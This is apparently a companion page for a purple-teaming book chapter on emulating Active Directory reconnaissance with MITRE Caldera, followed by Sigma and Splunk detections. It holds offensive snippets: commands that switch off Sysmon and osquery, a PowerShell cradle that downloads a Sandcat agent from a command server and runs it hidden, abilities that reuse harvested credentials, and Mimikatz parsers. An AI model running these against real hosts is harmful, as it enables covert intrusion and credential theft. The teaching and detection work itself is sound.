Introduction
In the second of the emulation chapters in the book, we explore the steps an adversary might take to enumerate the configuration of the environment, and high-value Active Directory users and hosts. In this chapter we use the second of our offensive tools, MITRE Caldera.
Chapter Content
This section provides reproductions of the key figures and code snippets seen in this chapter.
The Caldera Emulation Framework
Deploying Caldera
These commands stop and disable Sysmon and osquery on the Linux host to prevent unwanted telemetry being logged to Splunk.
ubuntu@ar-linux:~$ sudo systemctl stop sysmon
ubuntu@ar-linux:~$ sudo systemctl disable sysmon
ubuntu@ar-linux:~$ sudo systemctl stop osqueryd
ubuntu@ar-linux:~$ sudo systemctl disable osqueryd
Commands to clone the Caldera repository into /opt.
ubuntu@ar-linux:~$ cd /opt
ubuntu@ar-linux:/opt$ sudo git clone https://github.com/aguidetopurpleteaming/caldera.git --recursive
Commands to install Docker and build the Caldera container.
ubuntu@ar-linux:/opt$ cd /opt/caldera
ubuntu@ar-linux:/opt/caldera$ sudo apt update
ubuntu@ar-linux:/opt/caldera$ sudo apt install -y docker.io
ubuntu@ar-linux:/opt/caldera$ sudo docker build --build-arg WIN_BUILD=true . -t caldera:server
Command to launch the Caldera container and ‘detach’ to leave it running as a background process.
ubuntu@ar-linux:/opt/caldera$ sudo docker run -d --name=caldera -p 7010:7010 -p 7011:7011/udp -p 7012:7012 -p 8888:8888 caldera:server
Commands to spawn an interactive shell in the Caldera container and read the ‘red’ user default password.
ubuntu@ar-linux:/opt/caldera$ sudo docker exec -it caldera /bin/bash
root@e1a9473f9ca6:/usr/src/app# cat conf/local.yml
--snip--
users:
blue:
blue: z9yB8XthMOgaDiTChu7yXZ4sAdnJfJXwo9a_wo67hpY
red:
red: TxdlgzoC-0ZxnDTFYlUO_7UM3eEB1TecjYt3F43s2UY
Remotely Connecting to Endpoints
The PowerShell script used to connect hosts to the Caldera server by downloading and launching a Sandcat agent.
$server="http://10.0.1.21:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$data=$wc.DownloadData($url);
get-process | ? {$_.modules.filename -like "C:\Users\Public\agpt.exe"} | stop-process -f;
rm -force "C:\Users\Public\agpt.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\Users\Public\agpt.exe",$data) | Out-Null;
Start-Process -FilePath C:\Users\Public\agpt.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
Selecting Abilities
The YAML definition of the Identify active user ability:
---
- id: c0da588f-79f0-4263-8998-7496b1a40596
name: Identify active user
description: Find user running agent
tactic: discovery
technique:
attack_id: T1033
name: System Owner/User Discovery
platforms:
darwin:
sh:
command: whoami
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.user.name
- source: domain.user.name
linux:
sh:
command: whoami
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.user.name
- source: domain.user.name
windows:
psh:
command: |
$env:username
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.user.name
- source: domain.user.name
cmd:
command: echo %username%
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.user.name
- source: domain.user.name
Working with Facts
A YAML definition for the ability to identify processes run by the users of a Linux host.
---
- id: 3b5db901-2cb8-4df7-8043-c4628a6a5d5a
name: Find user processes
description: Get process info for processes running as a user
tactic: discovery
technique:
attack_id: T1057
name: Process Discovery
platforms:
linux:
sh:
command: |
ps aux | grep #{host.user.name}
--snip--
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- source: host.user.name
A snippet of the parser definitions for extracting users, passwords and NTHashes for users from Mimikatz output.
parsers:
plugins.stockpile.app.parsers.katz:
- source: domain.user.name
edge: has_password
target: domain.user.password
- source: domain.user.name
edge: has_hash
target: domain.user.ntlm
- source: domain.user.name
edge: has_hash
target: domain.user.sha1
An Impersonate User ability that leverages the paw_provenance plugin to match user credential facts to the current host.
---
- id: 3796a00b-b11d-4731-b4ca-275a07d83299
name: Impersonate user
description: Run an application as a different user
tactic: execution
technique:
attack_id: T1059.001
name: "Command and Scripting Interpreter: PowerShell"
platforms:
windows:
psh:
command: |
$job = Start-Job -ScriptBlock {
$username = '#{host.user.name}';
$password = '#{host.user.password}';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;
};
Receive-Job -Job $job -Wait;
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- source: host.user.name
- plugins.stockpile.app.requirements.basic:
- source: host.user.name
edge: has_password
target: host.user.password
Logging
calderaToAttire from: https://github.com/improsec/calderaToAttire
Command to convert an exported Caldera report output to ATTiRe format using calderaToAttire.
ubuntu@agpt:/Tools/calderaToAttire$ python CalderaToAttire.py Enumerator_report.json
Simulating Active Directory Enumeration
Commands used in the creation of abilities for Active Directory reconnaissance.
nltest /domain_trusts /all_trusts
nltest /dclist:%USERDOMAIN%
net group "Domain Admins" /domain
Additional commands leveraging PowerShell and the PowerView script.
Import-Module .\PowerView.ps1 -Force;
Get-DomainComputer -OperatingSystem *server* -Properties dnshostname
Import-Module .\PowerView.ps1 -Force;
Get-DomainUser -SPN
Defending Against the Attack
Command Line Arguments
A sigma rule for detection of nltest usage.
| Sourced from: https://github.com/SigmaHQ/sigma/blob/fad4742996c55d8d4663e611f84877a2b741dc46/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml |
title: Potential Recon Activity Via Nltest.EXE
id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248
related:
- id: 410ad193-a728-4107-bc79-4419789fcbf8
type: similar
- id: 903076ff-f442-475a-b667-4f246bcc203b
type: similar
- id: 77815820-246c-47b8-9741-e0def3f57308
type: obsolete
status: test
description: Detects nltest commands that can be used for information discovery
references:
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)
- https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/
- https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
- https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters
- https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
- https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html
- https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
- https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest
author: Craig Young, oscd.community, Georg Lauenstein
date: 2021-07-24
modified: 2023-12-15
tags:
- attack.discovery
- attack.t1016
- attack.t1482
logsource:
category: process_creation
product: windows
detection:
selection_nltest:
- Image|endswith: '\nltest.exe'
- OriginalFileName: 'nltestrk.exe'
selection_recon:
- CommandLine|contains|all:
- 'server'
- 'query'
- CommandLine|contains:
- '/user'
- 'all_trusts' # Flag for /domain_trusts
- 'dclist:'
- 'dnsgetdc:'
- 'domain_trusts'
- 'dsgetdc:'
- 'parentdomain'
- 'trusted_domains'
condition: all of selection_*
falsepositives:
- Legitimate administration use but user and host must be investigated
level: medium
A Splunk SPL query produced from the above Sigma rule, transformed using pySigma.
EventID=1
Image="*\\nltest.exe" OR OriginalFileName="nltestrk.exe"
(CommandLine="*server*" CommandLine="*query*") OR CommandLine IN ("*/user*", "*all_trusts*", "*dclist:*", "*dnsgetdc:*", "*domain_trusts*", "*dsgetdc:*", "*parentdomain*", "*trusted_domains*")
An equivalent query using process creation events with event ID 4688.
EventID=4688
NewProcessName=*\\nltest.exe
(CommandLine="*server*" CommandLine="*query*") OR CommandLine IN ("*/user*", "*all_trusts*", "*dclist:*", "*dnsgetdc:*", "*domain_trusts*", "*dsgetdc:*", "*parentdomain*", "*trusted_domains*")
Theshold-Based Alerting
A threshold-based Splunk SPL query, looking for more than two enumeration commands performed on the same host in the lookback window.
index=win
Channel="Microsoft-Windows-Sysmon/Operational"
EventID=1
(Image="*\\nltest.exe" AND CommandLine IN ("*/dclist*", "*/domain_trusts*")) OR (Image="*\\net*.exe" AND CommandLine="*Domain Admins*")
| stats dc(CommandLine) as distinct_commands by Computer
| where distinct_commands > 2
Suspicious LDAP Queries
Configuring SilkService
The SilkService XML configuration, set to fetch LDAP queries from the Microsoft-Windows-LDAP-Client provider.
<SilkServiceConfig>
<ETWCollector>
<Guid>6a1e76fd-792b-412f-91ea-4b365de07bae</Guid>
<CollectorType>user</CollectorType>
<ProviderName>Microsoft-Windows-LDAP-Client</ProviderName>
<OutputType>eventlog</OutputType>
</ETWCollector>
</SilkServiceConfig>
Commands to create and start the SilkService service.
C:\Program Files\SilkService> sc create SilkService binPath= "C:\Program Files\SilkService\SilkService.exe" start= auto
C:\Program Files\SilkService> sc start SilkService
The command to open the LDAP query window using dsquery,
C:\Users\Administrator> rundll32 dsquery,OpenQueryWindow
An LDAP query to execute in the query window.
(samAccountName=Administrator)
Forwaring SilkService Events
The configuration for Splunk event forwarding created at C:\Program Files\SplunkUniversalForwarder\etc\apps\silkservice_inputs_app\local\inputs.conf.
[WinEventLog://SilkService-Log]
disabled = false
renderXml = false
index = etw
source = XmlWinEventLog:SilkService-Log
Commands to restart the SplunkForwarder service to load the above configuration.
C:\Users\Administrator> sc stop SplunkForwarder
C:\Users\Administrator> sc start SplunkForwarder
A Splunk query to transform the SilkService logs and filter for the Microsoft-Windows-LDAP-Client.
index=etw
| spath input=Message
| rename XmlEventData.* as *
| search ProviderName="Microsoft-Windows-LDAP-Client"
Identifying Tool-Specific Queries
Splunk SPL query to identify usage of PowerView to find kerberoastable users via a specific LDAP search filter.
index=etw
| spath input=Message
| rename XmlEventData.* as *
| search ProviderName="Microsoft-Windows-LDAP-Client"
| search SearchFilter="(&(samAccountType=805306368)(servicePrincipalName=\*))"
A similar query for identifying discovery of Active Directory computers, again using PowerView.
index=etw
| spath input=Message
| rename XmlEventData.* as *
| search ProviderName="Microsoft-Windows-LDAP-Client"
| search SearchFilter= "(&(samAccountType=805306369)(operatingsystem=*server*))"
Resources
The following resources expand on topics covered in this chapter.
The Scenario
The translated Conti playbook showing Active Directory reconnaissance using LOLBAS and PowerView
"Conti-Leaked-Playbook-TTPs," accessed May 27, 2024
Read MoreSelecting Abilities
The YAML definition for the Identify active user ability provided by the Stockpile plugin
"c0da588f-79f0-4263-8998-7496b1a40596," accessed May 27, 2024
Read MoreCaldera has a feature-rich API that can be leveraged to automate the creation of abilities, adversaries and operations. This is an example of this end-to-end process
"pyCaldera," accessed November 3, 2024
Read MoreThe Compass plugin for Caldera provides a built-in ATT&CK Navigator and enables adversary profiles to be converted into Navigator layers and, going the other way, enables Navigator layers to be converted into adversary profiles (where the abilities exist)
"Compass," GitHub, accessed November 2, 2024
Read MoreWorking with Facts
Fact parsers provided by the Stockpile plugin, including one for Mimikatz output
"parsers," accessed May 27, 2024
Read MoreThe YAML definition for the Impersonate user ability that makes use of relationships between facts to operationalize username and password combinations
"3796a00b-b11d-4731-b4ca-275a07d83299," accessed May 27, 2024
Read MoreObfuscating Execution
Base64 obfuscator provided by the Stockpile plugin, used to modify executed abilities
"base64_basic.py," accessed May 27, 2024
Read MoreCommand Line Arguments
A Sigma rule for detecting Active Directory reconnaissance using nltest
"process_creation/proc_creation_win_nltest_recon.yml," GitHub, accessed November 3, 2024
Read MoreSuspicious LDAP Queries
A section of the PowerView script that constructs the LDAP search filter for kerberoastable users
"PowerView.ps1," accessed November 3, 2024
Read MoreA walkthrough by Riccardo Ancarani on use of SilkETW to detect suspicious LDAP queries with ETW telemetry
Riccardo Ancarani, "Hunting for Suspicious LDAP Activity with SilkETW and Yara," October 19, 2019
Read MoreA snippet from the Rubeus code base that includes the construction of an LDAP search filter for the purposes of identifying kerberoastable users
"Roast.cs," accessed May 27, 2024
Read MoreA snippet from the GetUserSPNs.py script that includes a similar code section for constructing an LDAP search for kerberoastable users
"GetUsersSPNs.py," accessed May 27, 2024
Read MoreA blog from Dom Chell on the red team perspective to Active Directory enumeration, including alternative sources of LDAP telemetry, defensive use cases and subsequent evasions
Dom Chell, "Active Directory Enumeration for Red Teams," MDSec, Feb, 2024
Read More